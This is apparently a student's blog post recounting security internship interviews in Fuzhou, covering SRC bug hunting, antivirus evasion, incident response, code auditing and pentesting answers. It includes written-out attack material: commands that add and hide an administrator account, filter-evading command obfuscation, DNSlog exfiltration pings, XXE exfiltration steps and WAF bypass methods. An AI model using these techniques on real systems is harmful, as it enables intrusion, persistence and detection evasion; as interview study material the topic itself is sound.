小白福州找实习的面试分享

XX实习安全服务工程师：

自我介绍
1.说说你比较深刻的SRC经历
我：挖到的第一个高危，xx学校的任意密码用户重置。hunter语法搜学院资产，然后在对一个学院的登录接口测试时，发现学号登录时通过bp抓的数据包里有手机号回显，然后利用找回密码接口是手机号和学号验证，过了第一个接口。第二个接口是对手机号的短信验证码验证，通过爆破的方式过了验证，实现了任意密码用户重置；
第二个是一套使用ruoyi的后台，通过ruoyi的默认弱口令登录后，对一处角色管理的接口搜索功能和导出功能 通过updatexml（）进行了sql报错注入，以及任意文件的读取，还有发现了shiro反序列化漏洞，通过爆破的方式获得了AES密钥，然后通过shiro的攻击工具，找到了构造链，实现了命令执行。

2.CS工具，说说免杀之类的
我：CS只是会基础的使用，平常没太接触。

事后copy个百度：
免杀手段：
修改特征码，可以根据污点检测的方式定位到触发杀软规则的病毒样本特征，修改明显的特征在一定程度上是可以实现免杀的。

花指令免杀，在程序 shellcode或特征代码区域增添垃圾指令，增加的垃圾指令不会影响文件执行，在动态查杀或者文件hash对比是校验会不一致。

加壳，比如upx加壳等，一般文件落地后对比哈希值也可绕过杀软。

二次编译，一般用于对shellcode进行二次编译bypass杀软。

poweshell免杀，但是一般防护软件或者系统本身正常调用powershell应用程序的时候都会产生告警，一般的安全设备是过不了的，需要在命令上使用手段绕过安全设备监测。
链接：
https://blog.csdn.net/m0_59598029/article/details/132830427

3.攻防演练

我：不太了解
百度学习：
https://zhuanlan.zhihu.com/p/628616559
可以和应急响应结合，蓝队：
1.netstat、takllist…查看端口连接、进程，看看有没有奇怪的地方
2.看web日志，有没有可疑数据
3.win+R，输入eventvwr.msc，直接进入事件查看器分析日志，分析日志
4.利用工具（D盾等），对可疑目录扫描，删除webshell
5.清理删除异常用户，利用工具等对端进行加固（白名单等）

红队：
1.web渗透测试，上传后门
2.用webshell工具连接
3.尝试使用net user zkaq /add去添加名为zkaq的用户；使用net localgroup administrators zkaq /add添加到管理员组
4.内网渗透..
5.远程连接或其他方式控制主机，选中开始->管理机工具->计算机管理，修改用户名后添加$进行隐藏

4.有没有做过应急响应，说说应急响应的流程

我：支支吾吾
百度：
1、准备阶段
准备阶段需要做的是主要是明确资产范围对可能产生安全问题的地方进行加固
【主要工作包括建立合理的防御 / 控制措施、建立适当的策略和程序、获得必要的资源和组建响应队伍等】
2、检测阶段
通过日常的监控，收集系统信息日志等手段对可疑的迹象进行分析、判定，如果判定他属于网络安全应急响应时间则对该事件进行上报：
（可以利用netstat -ano查看端口连接情况，也可以使用tasklist | findstr “PID”对具体pid进程定位。系统日志可以win+R，输入eventvwr.msc，直接进入事件查看器分析日志）

系统：
1074，通过这个事件ID查看计算机的开机、关机、重启的时间以及原因和注释。
6005，表示计算机日志服务已启动，如果出现了事件ID为6005，则表示这天正常启动了系统。
104，这个时间ID记录所有审计日志清除事件，当有日志被清除时，出现此事件ID。
安全：
4624，这个事件ID表示成功登陆的用户，用来筛选该系统的用户登陆成功情况。
4625，这个事件ID表示登陆失败的用户。
4720,4722,4723,4724,4725,4726,4738,4740,事件ID表示当用户帐号发生创建，删除，改变密码时的事件记录。
4727,4737,4739,4762,事件ID表示当用户组发生添加、删除时或组内添加成员时生成该事件。
安全事件ID汇总备查：

EVENT_ID 安全事件信息
1100 ——- 事件记录服务已关闭
1101 ——- 审计事件已被运输中断。
1102 ——- 审核日志已清除
1105 ——- 事件日志自动备份
1108 ——- 事件日志记录服务遇到错误
4608 ——- Windows正在启动
4609 ——- Windows正在关闭
4610 ——- 本地安全机构已加载身份验证包
4611 ——- 已向本地安全机构注册了受信任的登录进程
4612 ——- 为审计消息排队分配的内部资源已经用尽，导致一些审计丢失。
4614 ——- 安全帐户管理器已加载通知包。
4615 ——- LPC端口使用无效
4616 ——- 系统时间已更改。
4618 ——- 已发生受监视的安全事件模式
4624 ——- 帐户已成功登录
4625 ——- 帐户无法登录
等等等等https://zhuanlan.zhihu.com/p/648273519
可以在这里查看日志：
日志路径：C:\Windows\System32\winevt\Logs
查看日志：Security.evtx、System.evtx、Application.evtx

【目标是对网络安全事件做出初步的动作和响应，根据获得的初步材料和分析结果，预估事件的范围和影响程度，制定进一步的响应策略，并且保留相关证据。】
3、抑制阶段
分析影响范围，根据预案采取相应手段，限制攻击的范围，设置隔离区，把影响降低到最小（可以使用安全软件把危险文件进行隔离，如果整台电脑完全沦陷，也可以考虑首先断网）

【抑制阶段的目标是限制攻击的范围，抑制潜在的或进一步的攻击和破坏】
4、根除阶段
分析产生安全事件的原因，如果是木马、病毒就需要寻找病毒的传播源并且遏制、如果是入侵行为就可以通过入侵检测的方式捕获并检测数据流，也可以利用一些工具对病毒特征进行扫描分析和定位

【根除阶段的目标是在事件被抑制之后，通过对有关恶意代码或行为的分析结果，找出导致网络安全事件发生的根源，并予以彻底消除】
5、恢复阶段
对受到破坏的系统和信息还原成正常状态，从可信任的备份中恢复还原系统配置数据库等等，并对其进行监控，确保无误后可适当去掉之前的隔离等抑制措施

【恢复阶段的目标是将网络安全事件所涉及的系统还原到正常状态】
6、总结阶段
对我们上面所发生的安全事件进行总结，对你使用到有效的手段和方法做一个记录，对后面可能遇到的事件做一个示例

【总结阶段的目标是回顾网络安全事件处理的全过程，整理与事件相关的各种信息，并尽可能地把所有情况记录到文档中】

5.小程序、公众号的渗透测试+代码审计

我：配置抓包工具xxxxxxx【百度找方法，我之前发过配置方法：https://bbs.zkaq.cn/t/31391.html 不知道现在还能不能用】
然后就当作对web测试一样对小程序公众号进行测试了

实际应该补充：
2.对测试的小程序，在文件管理器找到该小程序的数据包，进行反编译下载源码（js、html）
3.代码审计找漏洞

6.代码审计" class="reference-link">6.代码审计

课上的代码执行、命令执行、变量覆盖、反序列化能想起来多少说多少【别忘了s-cms闪灵的xxe实体注入】：
可以整理一下学的，然后说的会比较通顺：

方法：
通读全文和危险函数定位

1.我审计过douphp框架的代码执行漏洞：将传参的字符串等内容当成代码来执行，如果有代码执行漏洞，我们就可以令服务器执行我们传参的字符串-代码
常见的危险函数：
eval 蚁剑
assert 中国菜刀
preg_replace() /e —> 第一个参数正则表达式，若第三个参数搜索到，就会执行第二个参数的代码
create_function()
array_map()
PHP版本5.5及其以上版本可以使用
“${phpinfo()}” —》单双引号过滤可以防御
unlink 是个删除文件的函数
file_put_contents => 文件写入
对DOUPHP框架进行代码审计：
通过代码审计发现，安装界面有file_put_contents()文件写入函数，并且其中写入文件的内容是可以传参控制的。 然后再通过审计发现进入douphp安装界面需要删除install.lock这个文件。接着定位到了一个unlink删除文件的函数，通过bp抓包方式可以改变传参内容，删除了install.lock进入到了安装界面。
通过文件写入函数以及利用 php里对字符串“${phpinfo()}”-—>会执行phpinfo()代码的特性实现了写入后门getshell

2.我还审计过phpadmin的文件包含漏洞【文件包含漏洞还可以结合图片马将图片马作为代码加载运行】
只有能包含任意文件时，他才是漏洞。
相关函数：
include => include_once
require => require_once
通过代码审计发现include函数的传参我们可以控制：
，但是有白名单检测。
我们通过mysql数据库会记录日志，字段名会在服务器留存文件，在这个文件写上后门，绕过了文件包含对白名单的检测
令include包含 含有后门的日志文件，成功getshell

3.我还审计过duomicms框架的变量覆盖漏洞：
变量覆盖就是后面的变量会覆盖掉前面的变量的值：当我们能够控制某个b变量的生成，是就能去实现另一个a变量的替换了，后续存在其他的危险点，只不过原本的a参数我们不能控制，然后我们通过b变量覆盖去覆盖掉原本不可控的a参数
可能存在变量覆盖漏洞的危险函数：

extract() 将数组转变成变量： 变量名-> 键值 变量值 -> 数组的值
parse_str() 将字符串转变成变量
$$k 先取变量k的值v，然后在转变成变量v

先通过代码审计分析出后台成功登录后session的变量构造
然后通过危险函数定位到了一处$$_REQUEST变量覆盖可控,覆盖session原本的值，成功免登录进入后台。

4.我还审计过IBOS框架的命令执行漏洞：
命令执行相关危险的函数：
1：system() => 直接执行系统指令，并且会打印出我们的结果
//passthru()=> 等价system()
2：exec() => 会执行指令，但是显示结果不会直接输出，结果只保留最后一行
3：shell_exec() => 会执行指令，但是显示结果不会直接输出，保留多行结果;;需要用echo 输出

Ibos有zend加密：
Zend Guard是目前市面上最成熟的PHP源码加密产品，只要PHP加载了这个第三方加密插件，那么就可以直接运行。这类加密会在开头写Zend
我们要代码审计，就得先解码。but！解码之后的代码是不能直接替代原本文件运行的，所以解码后的代码仅仅是静态审计。

通过代码审计，查找到了一个危险函数shell_exec的变量可以被控制，但是他过滤了.和’和”等特殊字符，我们就通过在cmd调用环境变量切割我们需要的.字符，成功上传了后门；

特殊技巧：

通过 > 符号，将结果输出到某个文件里面，结果覆盖保存
 >>  将结果输出到某个文件里面，结果末尾追加
 |  管道符，将前面的指令运行结果，当成后面指令的输入内容
     ipconfig| findstr "IPv4"
     【查找 ipconfig内容的IPV4内容】

没有回显时，怎么判断我们的指令有没有执行

1. dnslog.cn 通过dnslog将数据外带

ping -n 1 2.abt1zl.dnslog.cn  # windows 用 -n 指定ping的次数
ping -c 1 2.abt1zl.dnslog.cn  # linux 用 -c 指定ping的次数

1. 将指令的结果输出到一个文本文件中，然后去访问这个文件 >, >>, |

熟悉一下cmd相关的命令：
创建用户：net user name password /add
管理员添加：net localgroup administrators name /add
net user 查看本机用户
net localgroup 查看本地分组
net localgroup administrators 具体分组下有那些成员
dir查看文件夹所有内容
whoami/all 可查看权限
nslookup查看域名是否存在
netstat查看所有网络连接、状态、端口号
通过 > 符号，将结果输出到某个文件里面，结果覆盖保存
将结果输出到某个文件里面，结果末尾追加 | 管道符，将前面的指令运行结果，当成后面指令的输入内容 ipconfig| findstr “IPv4” 【查找 ipconfig内容的IPV4内容】
命令执行如何绕过过滤的操作：
1.^【不能连续俩个^否则成转义了】和”【无限制】和成对的()
eg：((((Wh^o^am””i)))) //正常执行
2.通过set变量：
eg：set a=who
set b=ami
%a%%b% //正常执行whoami
3.截取字符串的语法就是
%变量名:~x,y%
即对变量从第x个元素开始提取，总共取y个字符。
当然也可以写-x,-y，从后往前取
写作-x，可取从后往前数第x位的字符开始，一直到字符的末尾
-y来决定少取几个字符
具体看https://bbs.zkaq.cn/t/4557.html

5.我还学过s-cms闪灵框架的XXE实体注入：
通过审计源码，发现了simplexml_load_string()函数，分析找到了其中的此函数的传参可以受我们控制。然后搭建xml接收器，把想要的数据外带出来，传入一个php文件中，再用file_put_contents()把数据传入一个txt文件获取数据。
知识点：
XXE = XML外部实体注入 （被各种后端脚本调用，靶场这里是被php调用），令目标执行我们的XML代码
我们的xml代码主要利用：DTD（通过特殊的命令去其他文件读取信息）：SYSTEM
请求一个你自己搭建的php文件，其他的文件。（你想要的数据给带出来）
php文件记录请求的传参内容（记录文件）等着去看就可以了

1、XXE漏洞发生在哪里
任何可以上传XML文件的位置都有可能存在XXE漏洞。若没有对上传的XML文件进行过滤，可导致上传恶意文件。
找xxe漏洞方式：
看到数据包莫名其妙传递、返回XML代码可以试试
代码审计（危险函数定位：找类似simplexml_load…的函数）
2、怎么判断网站存在XXE漏洞
抓包：修改http请求，查看抓取的数据包中是否有提交XML文档，修改提交的XML文档再查看返回包响应，查看应用程序是否解析了修改内容，如果解析了则有可能存在XXE漏洞。
3、XXE漏洞的危害
(1)任意文件读取
如果攻击者可以控制服务器解析的XML文档的内容，引入攻击者想要读取的文件内容作为外部实体，即可尝试读取任意的文件内容。如攻击者构造如下的XML文档就会将/etc/passwd文件的内容引入进来并回显在页面中，造成敏感文件内容泄露。

(2)执行系统命令
如果服务器环境中安装了某些特定的扩展，即可利用其造成任意命令执行，如攻击者构造如下的XML文档：

在安装expect扩展的PHP环境中，PHP解析上面的XML文档，即会执行whoami的系统命令，并将结果回显。
(3)探测内网接口
如果Web服务器的的执行环境在内网，则可以通过请求内网IP的某个端口来判断该IP 的相应端口是否开放，这可以通过直接引用外部实体的方式引入要访问该端口的链接即可实现：

如果回显结果为“Connection Refused”，即可以判断该IP的81端口是开放的。
(4)攻击内网环境
服务器执行XML文档的环境本身在内网，因此XXE漏洞就类似于SSRF攻击，再结合内网中其他主机的漏洞，进一步进行内网渗透。
修复xxe漏洞：
1、libxml_disable_entity_loader(true); PHP的（禁止加载XML实体）
2、过滤SYSTEM关键字（无法去其他文件读取信息or访问网站）

XXXX公司渗透测试：

自我介绍

1.SQL注入的WAF绕过

参数污染
内联注释
大小写绕过 （很老的WAF才有用）
替换绕过 （很老的WAF才有用）
特殊符号绕过
编码绕过 ）
等价替换 （利用其它函数替代）
容器特性（例如Apace的Hpp,或者是IIS的%分割）
白名单（获得管理员权限xxx）
缓存区溢出（数据超出了WAF检测的范围）

2.说说对渗透测试的了解xxxxxxx" class="reference-link">2.说说对渗透测试的了解xxxxxxx

渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法：
渗透测试是指渗透人员在不同的位置（比如从内网、从外网等位置）利用各种手段对某个特定网络进行测试，以期发现和挖掘系统中存在的漏洞，然后输出渗透测试报告，并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告，可以清晰知晓系统中存在的安全隐患和问题。

可以顺便记记OWASP Top 10包括：注入、失效身份验证和会话管理、敏感信息泄露、XML外部实体注入攻击（XXE）、存取控制中断、安全性错误配置、跨站脚本攻击（XSS）、不安全的反序列化、使用具有已知漏洞的组件、日志记录和监控不足。

3.会不会代码审计
同上
4.SRC有没有挖到过高危漏洞，说说
同上，不复制了

5.会不会编程，开发过什么xxxxxx
就说说自己会的编程咯，学校学过的，课程设计或者毕业设计的说说；
我：学校学过python、java，python开发过爬虫，不能绕过登录；java开发过一个抓包工具，可以抓包不能改包0.0；

XX网络安全实习生：

1.代码审计—-
同上
2.会什么编程、开发过什么工具——
同上

3.内网渗透经验——

没有实战经验就讲课上学的：
内网单台服务器渗透：
https://bbs.zkaq.cn/t/31374.html
内网域渗透：
https://bbs.zkaq.cn/t/31378.html

4.攻防演练———
同上

5.SRC说说

XX渗透测试实习：

1.自行渗透的站（Src..)、高危漏洞

2.代码审计-有没有原创漏洞

代码审计同上；
原创漏洞我说无，只能复现，这方面不知道怎么编；

3.编程语言-开发工具

4.靶场渗透测试，内网域

内网单台服务器渗透：
https://bbs.zkaq.cn/t/31374.html
内网域渗透：
https://bbs.zkaq.cn/t/31378.html
5.有无社区公众号文章
拿出了我的zkaq社区号hh

6.有无护网

只能看看网上经验分享
https://zhuanlan.zhihu.com/p/628616559